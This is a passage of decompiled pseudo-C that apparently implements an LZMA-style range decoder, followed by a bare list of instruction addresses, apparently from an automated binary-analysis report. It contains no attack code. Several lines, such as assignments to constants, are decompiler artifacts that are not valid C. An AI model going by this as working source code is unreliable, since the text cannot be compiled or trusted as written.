											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f34
0x00406f3e
0x00406f0d
0x00406f16
0x00406f23
0x00406f26
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
